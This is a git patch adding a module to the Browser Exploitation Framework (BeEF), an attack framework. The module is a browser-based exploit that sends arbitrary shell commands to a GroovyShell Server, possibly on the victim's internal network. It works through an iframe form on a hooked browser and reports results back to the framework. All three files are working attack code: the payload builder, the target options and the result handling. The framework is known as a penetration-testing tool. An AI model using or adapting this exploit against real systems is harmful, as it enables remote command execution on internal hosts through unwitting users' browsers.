From 7de48ceafb02d0e753efe32c6d60dcc55e0e1eed Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 22 May 2013 02:32:27 +0930
Subject: [PATCH] Add GroovyShell Server Command Execution IPEC exploit module

---
 .../groovyshell_server_cmd_exec/command.js    | 43 +++++++++++++++++++
 .../groovyshell_server_cmd_exec/config.yaml   | 16 +++++++
 .../groovyshell_server_cmd_exec/module.rb     | 22 ++++++++++
 3 files changed, 81 insertions(+)
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/command.js
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/config.yaml
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/module.rb

diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
new file mode 100644
index 000000000..9eeaf268f
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(groovy_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
new file mode 100644
index 000000000..9ce57c7af
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        groovyshell_server_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "GroovyShell Server Command Execution"
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
new file mode 100644
index 000000000..e1dc60f1d
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end